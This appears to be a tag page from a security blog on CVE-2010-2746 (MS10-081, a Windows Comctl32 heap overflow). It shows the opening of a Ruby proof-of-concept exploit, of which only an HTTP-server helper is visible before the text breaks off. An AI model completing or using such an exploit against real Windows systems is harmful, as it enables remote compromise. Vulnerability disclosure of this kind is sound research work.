[태그:] CVE-2010-2746

Vulnerability

Windows Common Control Library (Comctl32) Heap Overflow (MS10-081, CVE-2010-2746)

#!/usr/bin/env ruby # http://breakingpointsystems.com/community/blog/microsoft-vulnerability-proof-of-concept # Nephi Johnson require 'socket' def http_send(sock, data, opts={}) defaults = {:code=>"200", :message=>"OK", :type=>"text/html", :desc=>"content"} opts = defaults.merge(opts) code = opts[:code] message = opts[:message] type = opts[:type] date_str = Time.now.gmtime.strftime("%a, %d %b %Y %H:%M:%S GMT") headers = "HTTP/1.1 #{code} #{message}\r\n" + "Date: #{date_str}\r\n" + "Content-Length: #{data.length}\r\n" + "Content-Type: #{type}\r\n\r\n" puts "[+] …